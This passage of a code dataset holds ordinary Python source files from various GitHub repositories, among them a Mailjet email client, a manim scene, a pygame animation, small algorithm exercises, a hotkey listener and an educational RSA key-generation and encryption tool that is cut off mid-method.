(0-50)\n :param origin: the origin of the logging event\n :param message: the logging event\n \"\"\"\n full_message = f\"{origin}: {message}\"\n self.logger.log(level=level, msg=full_message)\n\n def main(self) -> None:\n \"\"\"\n The main loop for the logger, reads from the queue and when there is a new logging event,\n output it\n \"\"\"\n while True:\n if not self.__new_log.value == 0:\n self.__log(**self.__logging_queue.get())\n\n if self.__logging_queue.empty():\n self.__new_log.value = 0\n\n time.sleep(0.1)\n","repo_name":"lamemakes/pilot-drive","sub_path":"backend/pilot_drive/master_logging/master_logger.py","file_name":"master_logger.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"40"} +{"seq_id":"20632984182","text":"from pathlib import Path\n\nfrom manim import *\n\nclass Determinant(Scene):\n def construct(self):\n text_color = \"#333\"\n vect1_color = \"#b98b99\"\n vect2_color = \"#b9b28b\"\n\n numberplane = NumberPlane(\n background_line_style={\n \"stroke_opacity\": 0.4\n }\n )\n\n determinant = MathTex(\n \"\\\\det\\\\left( \\\\begin{bmatrix}a && b \\\\\\\\ c && d \\\\end{bmatrix}\\\\right) = ad - bc\", font_size=105\n ).set_color(text_color)\n determinant[0][5].set_color(vect1_color)\n determinant[0][6].set_color(vect2_color)\n\n determinant[0][7].set_color(vect1_color)\n determinant[0][8].set_color(vect2_color)\n\n determinant[0][12].set_color(vect1_color)\n determinant[0][13].set_color(vect2_color)\n\n determinant[0][15].set_color(vect2_color)\n determinant[0][16].set_color(vect1_color)\n\n determinant.move_to(ORIGIN + UP * 2.25)\n\n origin = np.array([-6, -3, 0])\n\n vect_1 = np.array([12, 0, 0])\n vect_2 = np.array([0, 3, 0])\n\n grid_1 = vect_1 + vect_2\n grid_2 = vect_2 + vect_1\n\n vect1 = Line(start=origin, end=origin + vect_1, stroke_color=vect1_color, stroke_width=10).add_tip()\n dashed_line1 = DashedLine(start=origin + vect_1, end=origin + grid_1, stroke_color=\"#ccc\", stroke_width=10)\n\n vect2 = Line(start=origin, end=origin + vect_2, stroke_color=vect2_color, stroke_width=10).add_tip()\n dashed_line2 = DashedLine(start=origin + vect_2, end=origin + grid_2, stroke_color=\"#ccc\", stroke_width=10)\n\n center_point = origin + ((vect_1 + vect_2) * 0.5)\n\n area_text = MathTex(\"ad - bc\", font_size=150).set_color(\"#333\").move_to(center_point)\n area_text[0][0].set_color(vect1_color)\n area_text[0][1].set_color(vect2_color)\n\n area_text[0][3].set_color(vect2_color)\n area_text[0][4].set_color(vect1_color)\n\n rectangle = Rectangle(width=vect_1[0], height=vect_2[1], color=\"#ccc\").move_to(center_point)\n\n self.add(numberplane, rectangle, determinant, vect1, vect2, dashed_line1, dashed_line2, area_text)\n\n\nif __name__ == '__main__':\n config.background_color = WHITE\n config.format = 'gif'\n config.output_file = Path(__file__).resolve().parent.parent.parent / Path('notes/_media/determinant')\n config.pixel_width = 400\n config.pixel_height = 225\n\n scene = Determinant()\n scene.render()\n\n","repo_name":"lextoumbourou/notes","sub_path":"code/manim/determinant_cover.py","file_name":"determinant_cover.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"} +{"seq_id":"15378088016","text":"import logging\nfrom http import HTTPStatus\nfrom typing import Any, Literal\n\nimport httpx\nfrom pydantic import BaseModel, Field, ConfigDict\n\nlogger = 
logging.getLogger(__name__)\n\nHttpMethod = Literal[\"GET\", \"OPTIONS\", \"HEAD\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\"]\n\n\nclass EmailUser(BaseModel):\n model_config = ConfigDict(populate_by_name=True)\n\n email: str = Field(alias=\"Email\")\n name: str | None = Field(alias=\"Name\")\n\n\nclass Attachment(BaseModel):\n model_config = ConfigDict(populate_by_name=True)\n\n content_type: str = Field(alias=\"ContentType\")\n filename: str = Field(alias=\"Filename\")\n base64_content: str = Field(alias=\"Base64Content\")\n content_id: str | None = Field(alias=\"ContentID\")\n\n\nclass Message(BaseModel):\n model_config = ConfigDict(populate_by_name=True)\n\n from_user: EmailUser = Field(alias=\"From\")\n to_users: list[EmailUser] = Field(alias=\"To\")\n subject: str = Field(alias=\"Subject\")\n text_part: str | None = Field(alias=\"TextPart\")\n html_part: str | None = Field(alias=\"HTMLPart\")\n attachments: list[Attachment] | None = Field(alias=\"Attachments\")\n inline_attachments: list[Attachment] | None = Field(alias=\"InlinedAttachments\")\n\n\nclass MailjetClient:\n base_url = \"https://api.mailjet.com/v3.1\"\n\n def __init__(self, auth: tuple[str, str], timeout: float = 5.0):\n self.auth = auth\n self.timeout = timeout\n\n async def send_email(\n self,\n from_user: EmailUser,\n to_users: list[EmailUser],\n subject: str,\n text_part: str | None = None,\n html_part: str | None = None,\n attachments: list[Attachment] | None = None,\n inline_attachments: list[Attachment] | None = None,\n ) -> bool:\n \"\"\"Send email. Return True if it was sent, False otherwise.\n\n :raises TimeoutError when the request to Mailjet timed out\n :raises MailjetAPIError when a transport error occurred\n \"\"\"\n msg = Message(\n from_user=from_user,\n to_users=to_users,\n subject=subject,\n text_part=text_part,\n html_part=html_part,\n attachments=attachments,\n inline_attachments=inline_attachments,\n )\n payload = {\"Messages\": [msg.dict(exclude_none=True, by_alias=True)]}\n response = await self._call_api(\"POST\", f\"{self.base_url}/send\", json=payload)\n if response.status_code != HTTPStatus.OK:\n logger.error(\n \"Failed to send email. Mailjet returned %d status code. 
Response: %s\",\n response.status_code,\n response.text,\n )\n return False\n return response.json()\n\n async def _call_api(\n self, method: HttpMethod, url: str, json: dict[str, Any] | None = None\n ) -> httpx.Response | None:\n if not all(self.auth):\n return None\n async with httpx.AsyncClient() as client:\n try:\n response = await client.request(\n method,\n url,\n json=json,\n auth=self.auth,\n timeout=self.timeout,\n )\n return response\n except httpx.TimeoutException:\n raise TimeoutError from None\n except httpx.RequestError as exc:\n raise MailjetAPIError(exc) from None\n\n\nclass MailjetAPIError(Exception):\n ...\n","repo_name":"mirrorrim/service-example","sub_path":"app/seedwork/infrastructure/mailjet.py","file_name":"mailjet.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19882420383","text":"tot_cnt = 0\n\ndef dfs(nums,target,idx,cumSum):\n    if idx == len(nums): # traversal has finished\n        if cumSum == target: # the target number was hit\n            global tot_cnt\n            tot_cnt += 1 # count this case\n        return\n    else: # traversal still in progress\n        dfs(nums,target,idx+1,cumSum+nums[idx]) # recurse with the next element, cumulative value ± (current value)\n        dfs(nums,target,idx+1,cumSum-nums[idx])\n\ndef solution(numbers, target):\n    dfs(numbers,target,0,0)\n    return tot_cnt\n\n# expected output: 5\n# Numbers = [1, 1, 1, 1, 1]\n# Target = 3\n\n# expected output: 2\nNumbers = [4, 1, 2, 1]\nTarget = 4\n\nprint(solution(Numbers, Target))","repo_name":"claire-1125/AlgoStudy","sub_path":"Programmers/DFSnBFS/43165_TargetNumber_new.py","file_name":"43165_TargetNumber_new.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10027196500","text":"import sys\r\nl, r = list(map(str, sys.stdin.readline().strip().split(' ')))\r\neight = 0\r\n\r\nif (len(l) != len(r)):\r\n    print(0)\r\nelse:\r\n    for i in range(len(l)):\r\n        if l[i] == '8' and r[i] == '8':\r\n            eight += 1\r\n        elif l[i] != r[i]:\r\n            break\r\n    print(eight)\r\n","repo_name":"wzrabbit/algorithm-practice","sub_path":"BOJ/♠ 1000~1999/1105_팔.py","file_name":"1105_팔.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"43185295828","text":"# Python Crash Course, Eric Matthes, no starch press\r\n# Ch8 Functions\r\n# Textbook Exercises\r\n\r\n# Louis Lozano\r\n# 3-16-2019\r\n# 8-4_large_shirts.py\r\n\r\n# Description: A function that takes two parameters and uses them\r\n# to display a shirt's size and message printed on it. 
Both parameters\r\n# have default values.\r\n\r\n# A function definition with default values for it's parameters.\r\ndef make_shirt(size='large', message='I love Python!'):\r\n print('Shirt size: ' + size.title())\r\n print('Shirt message: ' + message)\r\n\r\n# A function call using positional arguments.\r\nmake_shirt('medium')\r\n\r\n# A function call using keyword arguments.\r\nmake_shirt(message='Peace.')\r\n\r\n# A function call using only the default values.\r\nmake_shirt()\r\n\r\n","repo_name":"louloz/Python-Crash-Course","sub_path":"Ch8_Functions/8_4_large_shirts.py","file_name":"8_4_large_shirts.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21866924772","text":"import os\nimport sys\n\nimport pygame\nfrom pygame.locals import *\n\n\nclass Bird(pygame.sprite.Sprite):\n def __init__(self, position, scale=0.5):\n pygame.sprite.Sprite.__init__(self)\n\n paths = [f'./images/frame-{i + 1}.png' for i in range(8)]\n imgs = [pygame.image.load(p) for p in paths]\n rect = imgs[0].get_rect()\n\n w, h = rect.size[0], rect.size[1]\n w, h = int(w * scale), int(h * scale)\n\n self.imgs = [pygame.transform.scale(img, (w, h)) for img in imgs]\n self.rect = self.imgs[0].get_rect()\n self.rect.center = position[0] - w / 2.0, position[1] - h / 2.0\n self.index = 0\n\n def draw(self, surface):\n surface.blit(self.imgs[self.index], self.rect.center)\n self.index += 1\n if self.index >= len(self.imgs):\n self.index = 0\n\n\ndef start():\n pygame.init()\n\n FPS = 30\n width = 400\n height = 400\n DISPLAYSURF = pygame.display.set_mode((width, height))\n DISPLAYSURF.fill((255, 255, 255))\n pygame.display.set_caption('Key Events')\n fps_clock = pygame.time.Clock()\n\n bird = Bird((200, 200), 0.10)\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n DISPLAYSURF.fill((255, 255, 255, 0))\n\n bird.draw(DISPLAYSURF)\n\n pygame.display.update()\n fps_clock.tick(FPS)\n\n\nif __name__ == '__main__':\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n start()\n","repo_name":"oneoffcoder/lightning-projects","sub_path":"python/pygame/basic/char-animation.py","file_name":"char-animation.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"25280338559","text":"import sys\nimport logging\n\nfrom threedify_sfm.SfM import SfM\nfrom threedify_sfm.DataSet import DataSet\nfrom threedify_sfm.utils.opensfm import OpenSfM\nfrom threedify_sfm.constants import SFM_IMPLEMENTATION, BATCH_SIZE\nfrom threedify_sfm.utils.reconstructions import (\n fetch_reconstructions,\n reconstruction_failed,\n reconstruction_success,\n)\n\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef main():\n reconstructions = fetch_reconstructions(BATCH_SIZE)\n\n for reconstruction in reconstructions:\n try:\n logger.info(\n \"Running SfM for reconstruction: %s (%s)\",\n reconstruction.id,\n reconstruction.name,\n )\n\n logger.info(\"Creating dataset for reconstruction.\")\n dataset = DataSet(reconstruction)\n\n if SFM_IMPLEMENTATION == \"OPENSFM\":\n logger.info(\"Using OpenSfM implementation.\")\n sfm = OpenSfM(dataset)\n else:\n logger.info(\"Using ThreeDify SfM implementation.\")\n sfm = SfM(dataset)\n\n logger.info(\"Running SfM pipeline.\")\n file_path = sfm.run()\n\n reconstruction_success(reconstruction, file_path)\n except:\n err = 
sys.exc_info()[0]\n logger.error(\"Error occurred while running SfM pipeline: %s\", err)\n reconstruction_failed(reconstruction)\n continue\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ThreeDify/ThreeDify-SfM","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33115471967","text":"import openpyxl as pyxl\r\n\r\nfilename = input(\"Enter the filepath: \")\r\nwb = pyxl.load_workbook(filename)\r\n\r\nsheetName = input(\"Sheet name: \")\r\nsheet = wb[sheetName].values\r\n\r\nstart = int(input(\"Row with headers (this is assumed to be the start of data): \")) - 1\r\nheaders = []\r\n# for i, row in enumerate(sheet):\r\n# print(row)\r\n# if i == start:\r\n# headers = row\r\n\r\nwhitelist = input(\"Whitelist text file name: \")\r\ntext = []\r\nwith open(whitelist, 'r', encoding='utf-8') as txt:\r\n text = txt.readlines()\r\n\r\ncolumn = int(input(\"Column with data: \")) - 1\r\n\r\nfiltered = []\r\nfor i, row in enumerate(sheet):\r\n if i == start:\r\n headers = row\r\n if row[0] == None:\r\n break\r\n elif i > start:\r\n url = row[column]\r\n if \"/\" in url:\r\n s = url.split('/')\r\n url = s[2]\r\n good = False\r\n for x in text:\r\n val = x.strip('\\n')\r\n if url in val:\r\n good = True\r\n if not good:\r\n element = []\r\n for z in row:\r\n if z == None:\r\n break\r\n else:\r\n element.append(z)\r\n filtered.append(element)\r\n\r\nnewFilename = input(\"New file location/name: \")\r\nnewFile = pyxl.Workbook()\r\nnewSheet = newFile.create_sheet(title=sheetName)\r\n\r\nfor i, h in enumerate(headers):\r\n newSheet.cell(row=1, column=i+1, value=h)\r\nif len(filtered) != 0:\r\n for r in range(1, len(filtered)+1):\r\n for c in range(len(filtered[0])):\r\n if c >= len(filtered[r-1]):\r\n newSheet.cell(row=r+1, column=c+1, value=None)\r\n else:\r\n newSheet.cell(row=r+1, column=c+1, value=filtered[r-1][c])\r\nnewFile.save(filename=newFilename)","repo_name":"loganwyas/test","sub_path":"url-whitelist.py","file_name":"url-whitelist.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70437969721","text":"# defines wandb logger\nimport os\nimport wandb \nfrom datetime import datetime\nfrom typing import Dict\nfrom argparse import Namespace\n\nclass WandbLogger(object):\n def __init__(self, args: Namespace):\n super().__init__()\n self._step = 0\n self._debug = args.debug\n now = datetime.now()\n exp_name = args.exp_name + \"-\" + str(now).replace(\" \", \"-\")\n wandb_input = {\n \"entity\": \"lil\",\n \"name\": exp_name,\n \"config\": args\n }\n wandb_input[\"project\"] = \"p-interactive-touchdown-sdr-vilt-debug\" if args.debug else \"p-interactive-touchdown-sdr-vilt\"\n if args.wandb_run_id is not None:\n wandb_input[\"id\"] = args.wandb_run_id\n wandb_input[\"resume\"] = \"must\"\n wandb.init(**wandb_input)\n\n self._sdr_train_loss_keys = []\n\n def log(self, results, split: str, step: int = None, commit=False):\n formated_results = {}\n if step is not None:\n self._step = step\n\n for k, v in results.items():\n formated_results[\"{}/{}\".format(split, k)] = v\n wandb.log(formated_results, step=self._step, commit=commit)\n\n def get_step(self):\n return self._step\n\n\n 
\n","repo_name":"lil-lab/phrase_grounding","sub_path":"src/utils/wandb_utils.py","file_name":"wandb_utils.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"35059854930","text":"from django import forms\n\nfrom timeline.models import Entry as TimelineEntry\n\n\nclass EntryForm(forms.ModelForm):\n    class Meta:\n        fields = ('lesson_type', 'lesson_id', 'teacher', 'start')\n        localized_fields = ('start',)\n        model = TimelineEntry\n        widgets = {\n            'start': forms.SplitDateTimeWidget(),\n            'lesson_id': forms.Select(),  # populated by calendar.coffee\n            'teacher': forms.HiddenInput()  # populated in the template\n        }\n","repo_name":"die-trying/django-celery","sub_path":"timeline/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"40"} +{"seq_id":"9229735326","text":"# http://scikit-learn.org/stable/modules/linear_model.html#ridge-regression\n\nfrom sklearn import linear_model\n\n# As with other linear models, Ridge will take in its fit method arrays X, y and will store the coefficients w of the\n# linear model in its coef_ member:\nreg = linear_model.Ridge(alpha=.5)\n\nreg.fit([[0, 0], [0, 0], [1, 1]], [0, .1, 1])\n# Ridge(alpha=0.5, copy_X=True, fit_intercept=True, max_iter=None, normalize=False, random_state=None, solver='auto', tol=0.001)\n\nprint(reg.coef_)  # [0.34545455 0.34545455]\nprint(reg.intercept_)  # 0.13636363636363638\n","repo_name":"raunakshakya/PythonPractice","sub_path":"scikit-learn/09_ridge_regression.py","file_name":"09_ridge_regression.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32844755595","text":"from pynput import keyboard\nimport datetime\nCOMBINATIONS=[\n    {keyboard.Key.alt_l,keyboard.KeyCode(char='a')},\n    {keyboard.Key.alt_l,keyboard.KeyCode(char='A')},\n]\ncurrent = set()\n\ndef execute():\n    print(\"time: {0}; pressed home\".format(datetime.datetime.now()))\n\ndef on_press(key):\n    if any([key in COMBO for COMBO in COMBINATIONS]):\n        current.add(key)\n        if any(all(k in current for k in COMBO) for COMBO in COMBINATIONS):\n            execute()\n\ndef on_release(key):\n    if any([key in COMBO for COMBO in COMBINATIONS]):\n        current.remove(key)\n\nwith keyboard.Listener(on_press=on_press,on_release=on_release) as listener:\n    listener.join()\n","repo_name":"jabzer/pyCode","sub_path":"learn/hotkey.py","file_name":"hotkey.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13734207489","text":"from ..env.wrapper import *\nfrom ..utils.logger import Logger\nfrom .sim.openraas_greedy import *\n\nclass SimulationAgent(object):\n    def __init__(self, config, log_dir=''):\n        self.config = config\n        self.max_episodes = config[\"num_ep_train\"]\n        self.max_steps = config['max_ep_length']\n        \n        # Environment\n        self.env_wrapper = EnvWrapper(config)\n        \n        # Algorithm\n        self.alg = OPGreedy()\n        \n        # Logger\n        log_path = f\"{log_dir}/simulation\"\n        self.logger = Logger(log_path)\n        \n    def run(self):\n        env = self.env_wrapper\n        config = self.config\n        \n        def get_state_clip(s, length):\n            # reset self.temp_point before using this function\n            begin = self.temp_point\n            end = begin + length\n            self.temp_point = end\n            return s[begin:end]\n        \n        for episode in range(self.max_episodes):\n            state = env.reset()\n            \n            for 
step in range(self.max_steps):\n task_info_num = config['task_info_num']\n filestore_info_num = config['filestore_info_num']\n candidates_num = config['candidates_num']\n \n # 1. modify state\n num = state.__len__()\n tasks_info = [] # (num, task_info_num)\n compute_info = [] # (num, 2)\n all_cand_num = [] # (num, 1)\n top_cand_info = [] # (num, candidates_num, filestore_info_num)\n true_candidates_num = [candidates_num for _ in range(num)]\n \n for n in range(num):\n self.temp_point = 0\n tasks_info.append(get_state_clip(state[n], task_info_num))\n compute_info.append(get_state_clip(state[n], 2))\n all_cand_num.append(get_state_clip(state[n], 1))\n candidates = get_state_clip(state[n], filestore_info_num * candidates_num)\n sepeated_cand_info = []\n for i in range(candidates_num):\n info = candidates[i * filestore_info_num : (i+1) * filestore_info_num]\n if np.sum(info) == -3.:\n true_candidates_num[n] = i\n break\n sepeated_cand_info.append(info)\n top_cand_info.append(sepeated_cand_info)\n \n # tasks_info = np.array(tasks_info)\n # compute_info = np.array(compute_info)\n # all_cand_num = np.array(all_cand_num)\n # top_cand_info = np.array(top_cand_info)\n \n # 2. gain action\n actions = []\n for i in range(num):\n if compute_info[i][0] == -1. or true_candidates_num[i] == 0:\n actions.append(-1)\n continue\n bws = [top_cand_info[i][j][0] for j in range(true_candidates_num[i])]\n ls = [top_cand_info[i][j][1] for j in range(true_candidates_num[i])]\n js = [top_cand_info[i][j][2] for j in range(true_candidates_num[i])]\n a = self.alg.get_action(compute_info[i][1], bws, ls, js)\n actions.append(a)\n \n actions = np.array(actions)\n \n # 3. go into next step\n state, reward, _ = env.step(actions)\n \n print(f\"E{episode}S{step}: reward={np.mean(reward)}\")","repo_name":"coolmoon327/OpenRaaS-Simulation","sub_path":"deprecated/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43595897581","text":"# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\nimport random\nimport threading\nimport time\nimport sys\nfrom ui import Ui_MainWindow\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox\n\nsys.setrecursionlimit(100000)\n\n\ndef generate_random_int_less(num):\n return random.randint(2, num)\n\n\ndef generate_random_int(length):\n ret = random.getrandbits(length)\n if ret % 2 == 0:\n return ret - 1\n else:\n return ret\n\n\ndef gcd(a, b):\n while b != 0:\n tmp = a % b\n a = b\n b = tmp\n return a\n\n\ndef fast_pow(num, k, mod):\n ret = 1\n while k > 0:\n if k % 2 == 1:\n ret = ret * num % mod\n num = num * num % mod\n k = k // 2\n return ret\n\n\ndef inverse(e, phi_n):\n arr = [0, 1, ]\n ret = extended_euclid(e, phi_n, arr)\n if ret == 1:\n return (arr[0] % phi_n + phi_n) % phi_n\n else:\n return -1\n\n\ndef extended_euclid(a, phi_n, arr):\n if phi_n == 0:\n arr[0] = 1\n arr[1] = 0\n return a\n ret = extended_euclid(phi_n, a % phi_n, arr)\n tmp = arr[0]\n arr[0] = arr[1]\n arr[1] = tmp - a // phi_n * arr[1]\n return ret\n\n\ndef get_e(phi_n):\n while True:\n _e = random.randint(2, phi_n)\n if gcd(_e, phi_n) == 1:\n return _e\n\n\ndef is_composite(a, m, k, num):\n if fast_pow(int(a), int(m), int(num)) == 1:\n return False\n for j in range(k):\n if fast_pow(int(a), int(m * (2 ** j)), int(num)) == num - 1:\n return 
False\n return True\n\n\ndef is_prime(num, certainty):\n prime_list = [3, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,\n 103,\n 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,\n 211,\n 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317,\n 331,\n 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443,\n 449,\n 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577,\n 587,\n 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701,\n 709,\n 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839,\n 853,\n 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983,\n 991,\n 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093,\n 1097,\n 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223,\n 1229,\n 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327,\n 1361,\n 1367, 1373, 1381, 1399, 1409, 1423, 1427, 1429, 1433, 1439, 1447, 1451, 1453, 1459, 1471, 1481,\n 1483,\n 1487, 1489, 1493, 1499, 1511, 1523, 1531, 1543, 1549, 1553, 1559, 1567, 1571, 1579, 1583, 1597,\n 1601,\n 1607, 1609, 1613, 1619, 1621, 1627, 1637, 1657, 1663, 1667, 1669, 1693, 1697, 1699, 1709, 1721,\n 1723,\n 1733, 1741, 1747, 1753, 1759, 1777, 1783, 1787, 1789, 1801, 1811, 1823, 1831, 1847, 1861, 1867,\n 1871,\n 1873, 1877, 1879, 1889, 1901, 1907, 1913, 1931, 1933, 1949, 1951, 1973, 1979, 1987, 1993, 1997,\n 1999]\n for prime in prime_list:\n if num == prime:\n return True\n if num % prime == 0:\n return False\n m = num - 1\n k = 0\n while m % 2 == 0: # num - 1 = m * 2 ^ k\n m = m // 2\n k += 1\n\n for i in range(certainty):\n a = generate_random_int_less(num - 1)\n if is_composite(a, m, k, num):\n return False\n return True\n\n\ndef generate_random_prime(length, certainty):\n ret = generate_random_int(length)\n\n while not is_prime(ret, certainty):\n # print(ret)\n ret += 2\n return ret\n\n\nclass MyThread(threading.Thread):\n def __init__(self, target, args, name):\n super(MyThread, self).__init__()\n self.target = target\n self.args = args\n self.prime = 2\n self.name = name\n\n def run(self):\n start = time.time()\n self.prime = self.target(*self.args)\n print(self.name, time.time() - start)\n\n def get_prime(self):\n try:\n return self.prime\n except Exception:\n return None\n\n\nclass MyMainForm(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MyMainForm, self).__init__(parent)\n self.setupUi(self)\n self.btn_en.clicked.connect(self.encrypt)\n self.btn_de.clicked.connect(self.decrypt)\n self.btn_de_crt.clicked.connect(self.crt_decrypt)\n self.btn_gen.clicked.connect(self.generate_key)\n self.n = 0\n self.e = 0\n self.d = 0\n self.p = 0\n self.q = 0\n self.ciphertext = ''\n self.message = ''\n\n def generate_key(self):\n type = self.comboBox.currentText()\n len = 0\n if type == 'RSA-768':\n len = 768\n elif type == 'RSA-1024':\n len = 1024\n elif type == 'RSA-2048':\n len = 2048\n elif type == 'RSA-4096':\n len = 4096\n\n start = time.time()\n\n # multi threads\n\n # random.seed(10)\n # try:\n # thread_p = MyThread(target=generate_random_prime, args=(len // 2, 5), name='p')\n # thread_q = MyThread(target=generate_random_prime, args=(len // 2, 5), name='q')\n 
# except:\r\n        #     print('Error: unable to start thread')\r\n        #     return\r\n        # thread_q.start()\r\n        # thread_p.start()\r\n        # thread_q.join()\r\n        # thread_p.join()\r\n        # gen_p = thread_p.get_prime()\r\n        # gen_q = thread_q.get_prime()\r\n\r\n        # start = time.time()\r\n        gen_p = generate_random_prime(len // 2, 5)\r\n        # print('p:', time.time() - start)\r\n        # start = time.time()\r\n        gen_q = generate_random_prime(len // 2, 5)\r\n        # print('q:', time.time() - start)\r\n        gen_n = gen_p * gen_q\r\n        phi_n = (gen_p - 1) * (gen_q - 1)\r\n        gen_e = get_e(phi_n)\r\n        gen_d = inverse(gen_e, phi_n)\r\n        self.gen_time.setText(str(round(time.time() - start, 4)) + 's')\r\n        self.n = gen_n\r\n        self.e = gen_e\r\n        self.d = gen_d\r\n        self.p = gen_p\r\n        self.q = gen_q\r\n        # print(hex(self.n))\r\n        # print(hex(self.d))\r\n        # print(hex(self.e))\r\n        # print(hex(self.p))\r\n        # print(hex(self.q))\r\n        self.val_N_pub.setText(str(hex(gen_n))[2:])\r\n        self.val_N_pri.setText(str(hex(gen_n))[2:])\r\n        self.val_E.setText(str(hex(gen_e))[2:])\r\n        self.val_D.setText(str(hex(gen_d))[2:])\r\n        self.val_P.setText(str(hex(gen_p))[2:])\r\n        self.val_Q.setText(str(hex(gen_q))[2:])\r\n        return gen_n, gen_e, gen_d, gen_p, gen_q\r\n\r\n    def encrypt(self):\r\n        try:\r\n            # print(self.val_N.toPlainText())\r\n            self.n = int(self.val_N_pub.toPlainText(), base=16)\r\n            self.e = int(self.val_E.toPlainText(), base=16)\r\n            self.message = self.message_input.toPlainText()\r\n        except:\r\n            QMessageBox.warning(self, 'Notice', 'Please check the public key and plaintext', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\r\n            return\r\n\r\n        if self.message == '':\r\n            QMessageBox.warning(self, 'Notice', 'Please enter the plaintext', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\r\n            return\r\n\r\n        start = time.time()\r\n        self.ciphertext = ''\r\n        for i in range(-(-len(self.message) // 20)):\r\n            m_slice = int.from_bytes(self.message[20 * i: 20 * (i + 1)].encode(\"utf-8\"), byteorder=\"big\")\r\n            # print('m_slice:', m_slice)\r\n            c_slice = fast_pow(m_slice, self.e, self.n)\r\n            # print('c_slice:', hex(c_slice))\r\n            self.ciphertext += '<ciphertext>' + str(hex(c_slice)[2:]) + '</ciphertext>\\n'\r\n        self.ciphertext_input.setText(self.ciphertext)\r\n        self.en_time.setText(str(round(time.time() - start, 4)) + 's')\r\n        # return self.fast_pow(self.message, self.e, self.n)\r\n\r\n    def decrypt(self):\r\n        try:\r\n            # print(self.val_N.toPlainText())\r\n            self.n = int(self.val_N_pri.toPlainText(), base=16)\r\n            self.d = int(self.val_D.toPlainText(), base=16)\r\n            self.ciphertext = self.ciphertext_input.toPlainText()\r\n        except:\r\n            QMessageBox.warning(self, 'Notice', 'Please check the private key and plaintext', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\r\n            return\r\n\r\n        if self.ciphertext == '':\r\n            QMessageBox.warning(self, 'Notice', 'Please enter the ciphertext', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\r\n            return\r\n\r\n        start = time.time()\r\n        c_list = self.ciphertext_input.toPlainText().split('\\n')\r\n        # print(c_list)\r\n        m = ''\r\n        # print(hex(self.n))\r\n        # print(hex(self.d))\r\n        for i in range(len(c_list) - 1):\r\n            try:\r\n                m_slice = fast_pow(int(c_list[i][12:-13], base=16), self.d, self.n)\r\n                # print('m_slice:', m_slice)\r\n                m += m_slice.to_bytes(((m_slice.bit_length() + 7) // 8), byteorder=\"big\").decode(\"utf-8\")\r\n            except:\r\n                QMessageBox.warning(self, 'Notice', 'Please check that the ciphertext is correct', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\r\n                return\r\n\r\n        self.ciphertext_input.setText(m)\r\n        self.de_time.setText(str(round(time.time() - start, 4)) + 's')\r\n\r\n        # return 